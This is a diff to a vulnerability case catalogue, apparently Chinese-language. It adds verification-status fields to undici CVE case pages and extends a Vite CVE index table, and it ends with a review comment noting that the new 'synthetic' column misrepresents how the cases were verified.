# Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect # Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2024-30261` - Canonical ID: `undici--CVE-2024-30261`


@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:29:26.373390Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -34,6 +38,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-c76h-
# Use of Insufficiently Random Values in undici # Use of Insufficiently Random Values in undici
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2025-22150` - Canonical ID: `undici--CVE-2025-22150`


@@ -8,6 +8,10 @@ updated_date: "2026-02-06T22:08:08.311705Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -34,6 +38,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-cxrh-
# undici Denial of Service attack via bad certificate data # undici Denial of Service attack via bad certificate data
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2025-47279` - Canonical ID: `undici--CVE-2025-47279`


@@ -8,6 +8,10 @@ updated_date: "2026-03-14T09:19:54.772219Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-2mjp-
# Undici has an HTTP Request/Response Smuggling issue # Undici has an HTTP Request/Response Smuggling issue
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2026-1525` - Canonical ID: `undici--CVE-2026-1525`


@@ -8,6 +8,10 @@ updated_date: "2026-03-13T20:54:25.563997Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-vrm6-
# Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression # Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2026-1526` - Canonical ID: `undici--CVE-2026-1526`


@@ -8,6 +8,10 @@ updated_date: "2026-03-13T20:54:25.572106Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-4992-
# Undici has CRLF Injection in undici via `upgrade` option # Undici has CRLF Injection in undici via `upgrade` option
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2026-1527` - Canonical ID: `undici--CVE-2026-1527`


@@ -8,6 +8,10 @@ updated_date: "2026-03-14T09:17:45.838435Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-f269-
# Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client # Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2026-1528` - Canonical ID: `undici--CVE-2026-1528`


@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:56:17.456091Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-g9mf-
# Undici has an unbounded decompression chain in HTTP responses on Node.js Fetch API via Content-Encoding leads to resource exhaustion # Undici has an unbounded decompression chain in HTTP responses on Node.js Fetch API via Content-Encoding leads to resource exhaustion
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2026-22036` - Canonical ID: `undici--CVE-2026-22036`


@@ -8,6 +8,10 @@ updated_date: "2026-03-13T20:54:26.149214Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-
# Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation # Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2026-2229` - Canonical ID: `undici--CVE-2026-2229`


@@ -8,6 +8,10 @@ updated_date: "2026-03-13T20:54:25.417862Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -30,6 +34,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-phc3-
# Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS # Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2026-2581` - Canonical ID: `undici--CVE-2026-2581`


@@ -8,7 +8,11 @@
- 总案例数: `12` - 总案例数: `12`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `12` - 重点 Markdown 案例数: `12`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `12`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -26,17 +30,17 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| vite allows server.fs.deny bypass via backslash on Windows | `medium` | `generated` | `official` | `2026-02-04T04:13:38.886554Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-62522.md) | | vite allows server.fs.deny bypass via backslash on Windows | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:13:38.886554Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-62522.md) |
| Vite middleware may serve files starting with the same name with the public directory | `medium` | `generated` | `official` | `2026-02-04T04:33:22.508417Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-58751.md) | | Vite middleware may serve files starting with the same name with the public directory | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:33:22.508417Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-58751.md) |
| Vite's `server.fs` settings were not applied to HTML files | `medium` | `generated` | `official` | `2026-02-04T04:35:16.287471Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-58752.md) | | Vite's `server.fs` settings were not applied to HTML files | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:35:16.287471Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-58752.md) |
| Vite's server.fs.deny bypassed with /. for files under project root | `medium` | `generated` | `official` | `2026-02-04T03:27:17.681639Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-46565.md) | | Vite's server.fs.deny bypassed with /. for files under project root | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:27:17.681639Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-46565.md) |
| Vite has an `server.fs.deny` bypass with an invalid `request-target` | `medium` | `generated` | `official` | `2026-02-04T04:11:44.900383Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-32395.md) | | Vite has an `server.fs.deny` bypass with an invalid `request-target` | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:11:44.900383Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-32395.md) |
| Vite allows server.fs.deny to be bypassed with .svg or relative paths | `low` | `generated` | `official` | `2026-02-04T03:51:38.412061Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-31486.md) | | Vite allows server.fs.deny to be bypassed with .svg or relative paths | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:51:38.412061Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-31486.md) |
| Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query | `low` | `generated` | `official` | `2026-02-04T04:37:24.129476Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-31125.md) | | Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:37:24.129476Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-31125.md) |
| Vite bypasses server.fs.deny when using ?raw?? | `low` | `generated` | `official` | `2026-02-04T03:13:24.371631Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-30208.md) | | Vite bypasses server.fs.deny when using ?raw?? | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:13:24.371631Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-30208.md) |
| Websites were able to send any requests to the development server and read the response in vite | `low` | `generated` | `official` | `2026-02-04T04:37:03.076966Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-24010.md) | | Websites were able to send any requests to the development server and read the response in vite | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:37:03.076966Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-24010.md) |
| Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS | `low` | `generated` | `official` | `2026-02-04T04:04:22.977459Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-45812.md) | | Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:04:22.977459Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-45812.md) |
| Vite's `server.fs.deny` is bypassed when using `?import&raw` | `low` | `generated` | `official` | `2026-02-04T04:05:31.919291Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-45811.md) | | Vite's `server.fs.deny` is bypassed when using `?import&raw` | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:05:31.919291Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-45811.md) |
| Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem | `low` | `generated` | `official` | `2026-02-04T04:17:01.410592Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-23331.md) | | Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:17:01.410592Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-23331.md) |
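Review bot: The new 实证方式 column shows `synthetic` on all 12 rows while the summary block in the same file reports 已实证(synthetic) `0` and 待人工/缺浏览器证据 `12`, so the column is printing a default mode, not how a case was actually verified, and a reader scanning the table will take it as "synthetic reproduction exists". I would render `-` (or `pending`) in 实证方式 whenever 实证状态 is `triage-manual`, and print `synthetic` or a real-version marker only once a run bundle backs it; the affected cell pair would then read `triage-manual` | `-` for every row in this table. If the generator must keep the planned value, renaming the header to 计划实证方式 removes the ambiguity without changing the data.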
